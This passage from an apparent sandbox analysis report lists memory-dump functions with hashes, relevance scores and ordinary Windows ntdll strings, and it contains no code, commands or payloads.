                                                                    • API String ID: 0-1757540487
                                                                    • Opcode ID: 5418c3fdc1c0fabba01ad9d8fa468504d11fa46b422536de9d98f372d5966bd1
                                                                    • Instruction ID: ac74e9e49e8f8a8f5132b83b451f0a2a282221485ac2ecaddbb54d9a812e6d4d
                                                                    • Opcode Fuzzy Hash: 5418c3fdc1c0fabba01ad9d8fa468504d11fa46b422536de9d98f372d5966bd1
                                                                    • Instruction Fuzzy Hash: A451E3B25043169BDB12DF28D444A6BF7E8BF88754F04092EFA85E7251FB34D908C7A2
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 017FE539, Relevance: 2.8, Strings: 2, Instructions: 261COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.294291430.0000000001710000.00000040.00000001.sdmp, Offset: 01710000, based on PE: true
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: `$`
                                                                    • API String ID: 0-197956300
                                                                    • Opcode ID: 05a91a0fb7c852bb70cf50c65af3218cd2861133de0ca7c3fb946f23ed8e9edd
                                                                    • Instruction ID: 0740cdbb995cab34f0e53a99819eeef9d8d997156b215ec6b14116439eff0f5d
                                                                    • Opcode Fuzzy Hash: 05a91a0fb7c852bb70cf50c65af3218cd2861133de0ca7c3fb946f23ed8e9edd
                                                                    • Instruction Fuzzy Hash: 0B915E312043429BE725CE29C845B1BFBE5AF84714F15892DF795CB394EB74E904CB62
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 017B51BE, Relevance: 2.7, Strings: 2, Instructions: 173COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.294291430.0000000001710000.00000040.00000001.sdmp, Offset: 01710000, based on PE: true
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID: Legacy$UEFI
                                                                    • API String ID: 2994545307-634100481
                                                                    • Opcode ID: 0b335bfae2ed7f5992b64ac01c42aa55097abf0510e4acf8fbc8cbf95efe5b61
                                                                    • Instruction ID: 987a4dd388b623d827758810d01e16c851817a02aeb56e3b161a3af61a70524a
                                                                    • Opcode Fuzzy Hash: 0b335bfae2ed7f5992b64ac01c42aa55097abf0510e4acf8fbc8cbf95efe5b61
                                                                    • Instruction Fuzzy Hash: C35169B1A456099FDB25DFA8C880BEEFBF8FB48704F14406DE609EB251DB719941CB10
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0173B171, Relevance: 1.7, APIs: 1, Instructions: 166COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.294291430.0000000001710000.00000040.00000001.sdmp, Offset: 01710000, based on PE: true
                                                                    Similarity
                                                                    • API ID: _vswprintf_s
                                                                    • String ID:
                                                                    • API String ID: 677850445-0
                                                                    • Opcode ID: 161aabed350bbe58c002f4f310d93306829025ca2ef7860368a0537b39af7428
                                                                    • Instruction ID: 1b26aff647abe7cc315bcd2716ab930288204801cac0d8a805b94d6f25666822
                                                                    • Opcode Fuzzy Hash: 161aabed350bbe58c002f4f310d93306829025ca2ef7860368a0537b39af7428
                                                                    • Instruction Fuzzy Hash: 1B51D071D002598EEF31CF68DA45BBEFBB0BF04724F1041ADD85AAB286D774494ACB91
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0175B944, Relevance: 1.7, APIs: 1, Instructions: 166COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0175B9A5
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.294291430.0000000001710000.00000040.00000001.sdmp, Offset: 01710000, based on PE: true
                                                                    Similarity
                                                                    • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                    • String ID:
                                                                    • API String ID: 885266447-0
                                                                    • Opcode ID: 9b5b18fb06fc99bf4def84c7e2071232cd49a3d10253c7faa725bf4f3632a49b
                                                                    • Instruction ID: 2a74dec0e982dd4f5065e1a3f178642d08ce6a33d6d8a91ab6936bfeb7b23554
                                                                    • Opcode Fuzzy Hash: 9b5b18fb06fc99bf4def84c7e2071232cd49a3d10253c7faa725bf4f3632a49b
                                                                    • Instruction Fuzzy Hash: CA515771A08341CFC761CF68C48492AFBF6FB88610F54896EFA8587359D7B0E944CB92
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 01762581, Relevance: 1.6, Strings: 1, Instructions: 329COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.294291430.0000000001710000.00000040.00000001.sdmp, Offset: 01710000, based on PE: true
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: PATH
                                                                    • API String ID: 0-1036084923
                                                                    • Opcode ID: d160cdb94162fe9098f82d0b14f3e7f858d077709b5b466ca28b19c602d4ca8b
                                                                    • Instruction ID: 03d357e5aa6c5c6402f02df7a2fcf14a97e0051d8816305002376e01b5852c9b
                                                                    • Opcode Fuzzy Hash: d160cdb94162fe9098f82d0b14f3e7f858d077709b5b466ca28b19c602d4ca8b
                                                                    • Instruction Fuzzy Hash: 89C1AE71E00219DBDB65DFA9D880BADFBB9FF48700F448029EA01BB255D738A941CF60
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0176FAB0, Relevance: 1.6, Strings: 1, Instructions: 306COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    • *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!, xrefs: 017ABE0F
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.294291430.0000000001710000.00000040.00000001.sdmp, Offset: 01710000, based on PE: true
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!
                                                                    • API String ID: 0-865735534
                                                                    • Opcode ID: c11657752c114a0b271c0315cef9e618cdb63a57bf0ab4599f311e5f69620604
                                                                    • Instruction ID: d3b6a75d3459f13d9bc8c6a78d1975422957f03960541ff1a06fca7650bc54d9
                                                                    • Opcode Fuzzy Hash: c11657752c114a0b271c0315cef9e618cdb63a57bf0ab4599f311e5f69620604
                                                                    • Instruction Fuzzy Hash: 76A12731B006068BEB26CF6DD46477AF7A9BF88710F04466AEE16CB685DB30D841CB80
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 01732D8A, Relevance: 1.4, Strings: 1, Instructions: 191COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.294291430.0000000001710000.00000040.00000001.sdmp, Offset: 01710000, based on PE: true
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: RTL: Re-Waiting
                                                                    • API String ID: 0-316354757
                                                                    • Opcode ID: 7be01d57229187ad6a76d2e8a3ca19476bab5a1f7cb5defd3a3c1f3f14bc9dc8
                                                                    • Instruction ID: f1a45e618574e515110a7a0a676e0abaedd83a8259b47e69e37236aa2cf261e3
                                                                    • Opcode Fuzzy Hash: 7be01d57229187ad6a76d2e8a3ca19476bab5a1f7cb5defd3a3c1f3f14bc9dc8
                                                                    • Instruction Fuzzy Hash: DC614931A80605AFDB32EF6CC848B7EFBA5EB89720F140299D911972C3C7749A40C792
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 01800EA5, Relevance: 1.4, Strings: 1, Instructions: 153COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.294291430.0000000001710000.00000040.00000001.sdmp, Offset: 01710000, based on PE: true
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: `
                                                                    • API String ID: 0-2679148245
                                                                    • Opcode ID: 1977f1f54262339abcc1f78d300ae3e0c7708e7650e6ebce8ccc8bab6b4d3f2e
                                                                    • Instruction ID: 3fade79c59492b8636afd0b81d25e857c77243cb288bcffcbf46c6478ca2c107
                                                                    • Opcode Fuzzy Hash: 1977f1f54262339abcc1f78d300ae3e0c7708e7650e6ebce8ccc8bab6b4d3f2e
                                                                    • Instruction Fuzzy Hash: 4A51AE713043469FD766DF18D888B1BBBE5EB84754F04092CFA86C72D1D670EA05C762
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0176F0BF, Relevance: 1.4, Strings: 1, Instructions: 137COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.294291430.0000000001710000.00000040.00000001.sdmp, Offset: 01710000, based on PE: true
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: @
                                                                    • API String ID: 0-2766056989
                                                                    • Opcode ID: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
                                                                    • Instruction ID: 3f4fa881d529af272c795c4c953397c39a414e0de4cc9fbbb8fdb96a1bebc4d3
                                                                    • Opcode Fuzzy Hash: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
                                                                    • Instruction Fuzzy Hash: 4A516A715057119BC320DF29C840A6BFBF8FF88750F008A29FA9687690E7B4E954CB91
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 017B3540, Relevance: 1.4, Strings: 1, Instructions: 130COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.294291430.0000000001710000.00000040.00000001.sdmp, Offset: 01710000, based on PE: true
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: BinaryHash
                                                                    • API String ID: 0-2202222882
                                                                    • Opcode ID: e0c6f27b89089bf2548a3f387f79c75bfc305838fb53dc2df21fde3c2be92b4f
                                                                    • Instruction ID: 4f99cf09917ad69c0e9c5bc25ee789d000d849e6f1af52a65525d4806a91a753
                                                                    • Opcode Fuzzy Hash: e0c6f27b89089bf2548a3f387f79c75bfc305838fb53dc2df21fde3c2be92b4f
                                                                    • Instruction Fuzzy Hash: 9A4142B1D0152DABDF21DA50CC84FEEF77CAB44718F1045A5EB09AB240DB309E888FA4
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 018005AC, Relevance: 1.4, Strings: 1, Instructions: 115COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.294291430.0000000001710000.00000040.00000001.sdmp, Offset: 01710000, based on PE: true
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: `
                                                                    • API String ID: 0-2679148245
                                                                    • Opcode ID: 39b8bc2de1f442ef1f569125be10905dd0dd778863a6d43cfec09233fd0d58f3
                                                                    • Instruction ID: 533f999664bf30a4dbaea685daa1f93af2fa9ea76e2b001e5b29a3fd1dcd7eb1
                                                                    • Opcode Fuzzy Hash: 39b8bc2de1f442ef1f569125be10905dd0dd778863a6d43cfec09233fd0d58f3
                                                                    • Instruction Fuzzy Hash: 8131043260434A6BE751DE28CC44F97BBDAEBC4794F144229FA59DB2C0D770EA04C791
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 017B3884, Relevance: 1.3, Strings: 1, Instructions: 95COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.294291430.0000000001710000.00000040.00000001.sdmp, Offset: 01710000, based on PE: true
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: BinaryName
                                                                    • API String ID: 0-215506332
                                                                    • Opcode ID: e38941842c79dff3ae6eb6805109d2a4c98763f56fa3b67dfcb5c544038ce145
                                                                    • Instruction ID: 4a69a86f808a3aab3a3f6ff06b2795fd867190167ac21bfa2a6587c987ae8bc8
                                                                    • Opcode Fuzzy Hash: e38941842c79dff3ae6eb6805109d2a4c98763f56fa3b67dfcb5c544038ce145
                                                                    • Instruction Fuzzy Hash: 5131E33290161ABFEB15DA5CC985FABFB74FB80B24F124169E915A7250D7309E80C7A1
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0176D294, Relevance: 1.3, Strings: 1, Instructions: 93COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.294291430.0000000001710000.00000040.00000001.sdmp, Offset: 01710000, based on PE: true
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: @
                                                                    • API String ID: 0-2766056989
                                                                    • Opcode ID: 50d2999da79d5ba97ead383cce5d0d1162c33d808075b2c344eaf7d57c76a438
                                                                    • Instruction ID: 173a1cb405d1c10249abf62e5897b1b9145fe93137489e70d42c1ea6c5be39e3
                                                                    • Opcode Fuzzy Hash: 50d2999da79d5ba97ead383cce5d0d1162c33d808075b2c344eaf7d57c76a438
                                                                    • Instruction Fuzzy Hash: B331ADB2618305DFC721DF69C98496BFBECEB89654F00092EF9D583250E634DD08CB92
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 01741B8F, Relevance: 1.3, Strings: 1, Instructions: 86COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.294291430.0000000001710000.00000040.00000001.sdmp, Offset: 01710000, based on PE: true
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: WindowsExcludedProcs
                                                                    • API String ID: 0-3583428290
                                                                    • Opcode ID: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
                                                                    • Instruction ID: 5a0c5af2491a966f86f5e2ffbd36618415e92fd25f239223d1f7400d5c0ca6b8
                                                                    • Opcode Fuzzy Hash: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
                                                                    • Instruction Fuzzy Hash: 7D21073A900229ABDF22EA5DDC44F6BFBADEF41650F454465FE048B200E730EC50DBA4
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0175F716, Relevance: 1.3, Strings: 1, Instructions: 71COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.294291430.0000000001710000.00000040.00000001.sdmp, Offset: 01710000, based on PE: true
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: Actx
                                                                    • API String ID: 0-89312691
                                                                    • Opcode ID: 0f1c0d08af7a323071c1021d4ea50adcf097d2fae2cf3fbb161d729469767d87
                                                                    • Instruction ID: 169fc1de024de54d5be7624929bc08327bb573ff207cf31a5c04757625d575e7
                                                                    • Opcode Fuzzy Hash: 0f1c0d08af7a323071c1021d4ea50adcf097d2fae2cf3fbb161d729469767d87
                                                                    • Instruction Fuzzy Hash: FC11B2353456428BFBA54E1D8490736F696EB96624FA44D7AED62CB391EBF0C8408740
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 017E8DF1, Relevance: 1.3, Strings: 1, Instructions: 45COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    • Critical error detected %lx, xrefs: 017E8E21
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.294291430.0000000001710000.00000040.00000001.sdmp, Offset: 01710000, based on PE: true
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: Critical error detected %lx
                                                                    • API String ID: 0-802127002
                                                                    • Opcode ID: 2249dd587e1754d22fc79fce102a5a9d08662ea174fc3e2e107635b0bfc8eed1
                                                                    • Instruction ID: 88ae31e2eb68994817b49e7e31ea05353d95334b08ddedcb616ef67929d824b6
                                                                    • Opcode Fuzzy Hash: 2249dd587e1754d22fc79fce102a5a9d08662ea174fc3e2e107635b0bfc8eed1
                                                                    • Instruction Fuzzy Hash: CD1123B1D55348DADB29DFA8C909B9CFBF0AB18714F24426EE569AB282C2740602CF15
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 017CFF10, Relevance: 1.3, Strings: 1, Instructions: 44COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    • NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p, xrefs: 017CFF60
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.294291430.0000000001710000.00000040.00000001.sdmp, Offset: 01710000, based on PE: true
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p
                                                                    • API String ID: 0-1911121157
                                                                    • Opcode ID: 18af798cf52eb6465d222bec8406333ab7cc467e57d45d1016fda0ecc836b7cf
                                                                    • Instruction ID: 87f4f77d054343dd8cca38383477aea29cb2af32ffe8cf053810f0d76406bb51
                                                                    • Opcode Fuzzy Hash: 18af798cf52eb6465d222bec8406333ab7cc467e57d45d1016fda0ecc836b7cf
                                                                    • Instruction Fuzzy Hash: 0211E171950145EFDB26EF94C848F98FBB2FF08B14F15804CF504972A1C7799A80DB90
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 01805BA5, Relevance: .6, Instructions: 592COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.294291430.0000000001710000.00000040.00000001.sdmp, Offset: 01710000, based on PE: true
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: e71bf1d1e2e2abb5fb86f0daade9baf6f69b9dbb61087ff218eb3f04cfea9f05
                                                                    • Instruction ID: 330e8f15d84c87f4f2e520ea09b5d50385cd9eb4da833a75bb47520fb4c4209d
                                                                    • Opcode Fuzzy Hash: e71bf1d1e2e2abb5fb86f0daade9baf6f69b9dbb61087ff218eb3f04cfea9f05
                                                                    • Instruction Fuzzy Hash: B6425C75900229CFDB65CF68CC80BA9BBB1FF45304F1581AAD94DEB282E7349A95CF50
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 01754120, Relevance: .4, Instructions: 444COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.294291430.0000000001710000.00000040.00000001.sdmp, Offset: 01710000, based on PE: true
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 32548e2968b7b21aabf5e1efb254ddf75bd97b35f3aec7fde8d959a44d3e91ab
                                                                    • Instruction ID: 21e4d98f1f781319e117b6b1c178d76f6c555c9a4f77ea7a497be37a3c7fc03f
                                                                    • Opcode Fuzzy Hash: 32548e2968b7b21aabf5e1efb254ddf75bd97b35f3aec7fde8d959a44d3e91ab
                                                                    • Instruction Fuzzy Hash: 93F19C706082118FCB64CF18C484A7AFBE1FF88754F14496EF98ACB291EB74D985CB52
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 017620A0, Relevance: .4, Instructions: 420COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.294291430.0000000001710000.00000040.00000001.sdmp, Offset: 01710000, based on PE: true
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 747fa1eadc8878f6df42c0729c42c257524739ee22ccf8ac88259512944f0dd2
                                                                    • Instruction ID: 76c3b8561ea9b8608579469515b5c70372a931b49d3aa5f5a5055e1b9f6aae64
                                                                    • Opcode Fuzzy Hash: 747fa1eadc8878f6df42c0729c42c257524739ee22ccf8ac88259512944f0dd2
                                                                    • Instruction Fuzzy Hash: 27F1C135A083419FDB66CF2CC84476AFBE9AFC5324F09865DED959B282D734D841CB82
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0174D5E0, Relevance: .4, Instructions: 353COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.294291430.0000000001710000.00000040.00000001.sdmp, Offset: 01710000, based on PE: true
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 36becccf5b64c0dd51d787596966f98300a60ebd287561bab7b2e57bc766da0e
                                                                    • Instruction ID: d74f0309c79f7474d4e1f6ee19f6091e4471948c9baf7f03f80e260777580ce7
                                                                    • Opcode Fuzzy Hash: 36becccf5b64c0dd51d787596966f98300a60ebd287561bab7b2e57bc766da0e
                                                                    • Instruction Fuzzy Hash: 46E1DE30A0035ACFEB32CF68D884BA9F7B6BF56304F0441D9D94997291D774AA85CF52
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0174849B, Relevance: .3, Instructions: 290COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.294291430.0000000001710000.00000040.00000001.sdmp, Offset: 01710000, based on PE: true
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: a84e149922692a3d51df814dab840c9bc0bd7e493600f22ab26155e0523c8112
                                                                    • Instruction ID: 6b8f1068f71d154bc2d7adfa9aa0d569f6c7704b36d00655ba30f09cd52fc404
                                                                    • Opcode Fuzzy Hash: a84e149922692a3d51df814dab840c9bc0bd7e493600f22ab26155e0523c8112
                                                                    • Instruction Fuzzy Hash: A7B15A70E00209DFDF25DFE9C984AADFBB9FF58304F10412AE605AB24AD774A945CB91
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0176513A, Relevance: .3, Instructions: 258COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.294291430.0000000001710000.00000040.00000001.sdmp, Offset: 01710000, based on PE: true
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: a3564f446fd4fdd4e354222e0b686704543b3be3285c1846148f314ba0131ecc
                                                                    • Instruction ID: ae7be00edb6736973086db3f6be9f34e3296aeacf23a13ff2ba614ec43659b5f
                                                                    • Opcode Fuzzy Hash: a3564f446fd4fdd4e354222e0b686704543b3be3285c1846148f314ba0131ecc
                                                                    • Instruction Fuzzy Hash: 56C122B55083818FD354CF28C480A5AFBF1BF88304F584A6EF9998B352D771E985CB82
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 017603E2, Relevance: .3, Instructions: 254COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.294291430.0000000001710000.00000040.00000001.sdmp, Offset: 01710000, based on PE: true
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: d56ada58a33d341033a675deb77cff955cf7534da36ac3f4ae5e43c8b0ed48ee
                                                                    • Instruction ID: c954522c5a45876fbdaf8b66a0f9d1954abca2ed9fb7728b43ef560326f1f441
                                                                    • Opcode Fuzzy Hash: d56ada58a33d341033a675deb77cff955cf7534da36ac3f4ae5e43c8b0ed48ee
                                                                    • Instruction Fuzzy Hash: EE91E631E00215ABEB369B6CC848BADFFA8AB45724F590365FE12A72D1D7B49D40C7C1
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0173C600, Relevance: .2, Instructions: 225COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.294291430.0000000001710000.00000040.00000001.sdmp, Offset: 01710000, based on PE: true
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: bb856305d9649c924e4b78d685d75a35eb1b26753eb79bc95745b40bcb95376c
                                                                    • Instruction ID: 7b7e027c53bd53f195d7fde5fd94bd2baa9b6bf41bd3438e3657e43426c86e77
                                                                    • Opcode Fuzzy Hash: bb856305d9649c924e4b78d685d75a35eb1b26753eb79bc95745b40bcb95376c
                                                                    • Instruction Fuzzy Hash: 5F818275604301DBDB2ACF58C890A6BF7A4EBC4350F544A6AEE459B245D332DE41CBA2
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 017CB8D0, Relevance: .2, Instructions: 199COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.294291430.0000000001710000.00000040.00000001.sdmp, Offset: 01710000, based on PE: true
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 11efe43baf6efa60074e6a277eacea78942a3dcf9091dfdb87c624565cd597b6
                                                                    • Instruction ID: ae9aaf2c453ae005574db073613589eb4216e1a4dd1f6e62774376d5b80525ad
                                                                    • Opcode Fuzzy Hash: 11efe43baf6efa60074e6a277eacea78942a3dcf9091dfdb87c624565cd597b6
                                                                    • Instruction Fuzzy Hash: 5771DF32240702EFEB328F28C846F5AFBA5EB44BA1F14452CF655876A0DB75EA41CB50
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 017B6DC9, Relevance: .2, Instructions: 199COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.294291430.0000000001710000.00000040.00000001.sdmp, Offset: 01710000, based on PE: true
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 14c8b9f4068581bf64678a8c47a68024946722c1230469e973f7e326b4b11c8c
                                                                    • Instruction ID: c768c3ebd98ad010967ed685e01089c8e806376bc3954d749bfac7a9d4279889
                                                                    • Opcode Fuzzy Hash: 14c8b9f4068581bf64678a8c47a68024946722c1230469e973f7e326b4b11c8c
                                                                    • Instruction Fuzzy Hash: 1E715E71A00219EFDB14DFA9C984FEEFBB9FF48710F104469EA05A7294D734AA41CB90
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 017352A5, Relevance: .2, Instructions: 161COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.294291430.0000000001710000.00000040.00000001.sdmp, Offset: 01710000, based on PE: true
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: b53e426a8c5dc3787d8cd6afa652162d95031f6d8c553b6f7d312128c5347770
                                                                    • Instruction ID: 834dcc01c79a62af1c9cf463573ede1694ee79735b12c47961615e1ce32f1af2
                                                                    • Opcode Fuzzy Hash: b53e426a8c5dc3787d8cd6afa652162d95031f6d8c553b6f7d312128c5347770
                                                                    • Instruction Fuzzy Hash: 02510070205742ABDB22EF68C844B27FBE8FFA4720F10091EF59583652E774E944CB92
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 01762AE4, Relevance: .2, Instructions: 159COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.294291430.0000000001710000.00000040.00000001.sdmp, Offset: 01710000, based on PE: true
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 9798d71f7a172d7fed8cba3af5598670d43a7bedd5ccc40cd62b86745e2f3b28
                                                                    • Instruction ID: 99d11dd2d82b388fd749dad48a69216a1f532d8a2ae2a3df03d84b2e016dbffc
                                                                    • Opcode Fuzzy Hash: 9798d71f7a172d7fed8cba3af5598670d43a7bedd5ccc40cd62b86745e2f3b28
                                                                    • Instruction Fuzzy Hash: 7451AE76B00115CBCB65CF1CC8909BDF7B5FB89700719845AEC4AAB326E730AA41CB90
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 017FAE44, Relevance: .2, Instructions: 152COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.294291430.0000000001710000.00000040.00000001.sdmp, Offset: 01710000, based on PE: true
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: ff8df3b1c7ed6c4a5a194d9d7c6769558c5402c25e5cf2f379914819d7d9e9c5
                                                                    • Instruction ID: 00b081767df4c85662e290363ecef7a469f740aa89a8c202a8eca78fdec8d4bd
                                                                    • Opcode Fuzzy Hash: ff8df3b1c7ed6c4a5a194d9d7c6769558c5402c25e5cf2f379914819d7d9e9c5
                                                                    • Instruction Fuzzy Hash: C141D3B17002119BD7268A29C894F3BFBD9AF98720F04821DFB1E8B3D4DB34D941C691
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0175DBE9, Relevance: .1, Instructions: 149COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.294291430.0000000001710000.00000040.00000001.sdmp, Offset: 01710000, based on PE: true
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 7c1e76ae0c6b538662a51c756ea9b6e15b28f6ec4d2d98f4a9cc8730692b8a60
                                                                    • Instruction ID: 7660e02286233838ef0ebdf3dd40399433d16a115ed8f70426610fbd1039d7bb
                                                                    • Opcode Fuzzy Hash: 7c1e76ae0c6b538662a51c756ea9b6e15b28f6ec4d2d98f4a9cc8730692b8a60
                                                                    • Instruction Fuzzy Hash: 7F51B271E01616CFCB65CFACC490AAEFBF1BF49310F20815AD955A7345DBB1A984CB90
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0174EF40, Relevance: .1, Instructions: 147COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.294291430.0000000001710000.00000040.00000001.sdmp, Offset: 01710000, based on PE: true
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
